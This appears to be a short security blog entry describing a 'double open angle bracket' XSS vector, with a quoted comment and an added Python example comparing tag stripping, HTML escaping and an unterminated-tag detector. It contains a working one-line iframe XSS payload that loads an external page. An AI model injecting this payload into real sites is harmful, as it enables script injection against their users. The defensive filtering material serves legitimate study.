Double open angle brackets
This is an odd cross-site scripting vector that Steven Christey brought to my attention. At first blush I misclassified this as the same XSS vector as the “Half open” vector, but it’s surprisingly different. Using an open angle bracket at the end of the vector instead of a close angle bracket causes different behavior in Netscape’s Gecko rendering engine. Without the second open angle bracket, Firefox will work (that is, if you remove it, the vector still works in Firefox), but Netscape won’t. Here’s an example:
<iframe src=http://ha.ckers.org/scriptlet.html <



June 11th, 2006 at 11:01 am
[…] So after laughing for about ten minutes I did some research and it turns out that here is what is happening. Using the MSN search someone happened to find a page that was referencing a double-open angle bracket vector. Hotbot didn’t sanitize the HTML because it was incomplete (most likely) and instead rendered it. Because it was linking to a page that didn’t exist “scriptlet.html<BR>” it was redirecting back to my homepage as a 404. Obviously it would be extremely easy to fashion this into a real XSS exploit, but I think this proves the point. If you want to see for yourself follow this link. […]
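
An added example (not code from the original post, the comment above, or any product named on this page) showing why a filter that only recognises complete `<...>` tags passes the unterminated vector through unchanged, alongside output encoding and a check that flags unterminated tags. The function names and both regular expressions are assumptions made for illustration.

```python
import html
import re

# Constructed sample input: the unterminated tag quoted in the post above.
VECTOR = "<iframe src=http://ha.ckers.org/scriptlet.html <"

# Hypothetical weak filter: it only knows about tags that end in '>'.
COMPLETE_TAG = re.compile(r"<[^<>]*>")

# Hypothetical detector: a '<' that starts a tag name and is followed by
# another '<' or end of input before any closing '>'.
UNTERMINATED_TAG = re.compile(r"<[A-Za-z/!][^<>]*(?=<|\Z)")


def strip_complete_tags(text):
    """Weak approach: delete complete <...> tags and keep everything else."""
    return COMPLETE_TAG.sub("", text)


def escape_for_html(text):
    """Hardened approach: encode markup-significant characters on output,
    so the browser never sees a raw '<' from untrusted input."""
    return html.escape(text, quote=True)


def find_unterminated_tags(text):
    """Return tag openings that are never closed with '>' (useful for
    logging or rejecting input before it reaches a template)."""
    return UNTERMINATED_TAG.findall(text)


def compare(text):
    """Summarise what each approach leaves behind for one input."""
    stripped = strip_complete_tags(text)
    escaped = escape_for_html(text)
    return {
        "stripped": stripped,
        "stripped_has_raw_lt": "<" in stripped,
        "escaped": escaped,
        "escaped_has_raw_lt": "<" in escaped,
        "unterminated": find_unterminated_tags(text),
    }


if __name__ == "__main__":
    for sample in (VECTOR, "<b>hi</b>", "1 < 2"):
        print(sample, "->", compare(sample))
```

The tag-stripping filter returns the vector byte for byte because it contains no `>` to match, while output encoding neutralises it regardless of how the tag is terminated.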